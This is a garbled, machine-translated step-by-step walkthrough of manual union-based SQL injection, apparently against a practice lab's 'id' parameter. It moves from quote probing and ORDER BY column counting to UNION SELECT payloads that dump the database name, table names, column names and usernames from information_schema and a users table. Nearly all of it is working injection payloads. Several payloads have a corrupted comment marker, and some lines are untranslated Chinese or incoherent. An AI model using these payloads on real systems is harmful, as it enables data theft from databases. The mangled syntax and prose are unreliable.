1. First, injection type is determined
(1) First see demands to pass a parameter ID, and the requirements of a digital type;? Id = 1
(2) enter? id = 1 '
Found error
(3) Input? Id = 1 ''
Given single quotes, double quotes normal display, character determination is injected;
2. The determination of the number of columns
(1) input id = 1 'order by 1 -? + (- + is a comment statement)
? (2) input id = 1 'order by 2 - +
? (3) input id = 1 'order by 3 - +
? (4) input id = 1 'order by 4 - +
Analyzing thus have three
3. Check the display position, determines the position of the hand injection
(1) input id = -1 'union select 1,2,3 -? + (Query using union joint injection parameter, the parameter being given to the front of the union later union perform data thus read id = id = 1 implanting at -1)
3 is a display position, at this time may be the position of the hand Note 3
4. injection
? (1) Note the current database name: id = -1 'union select 1, database (), 3 - +
(2)爆注册表。?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+
(3) Note field a particular table, an example where users to: id = -1 'union select 1, group_concat (column_name), 3 from information_schema.columns where table_name = "users" - +?
(4)注字段的值,这里以users表里的username为例:?id=-1' union select 1,group_concat(username),3 from security.users --+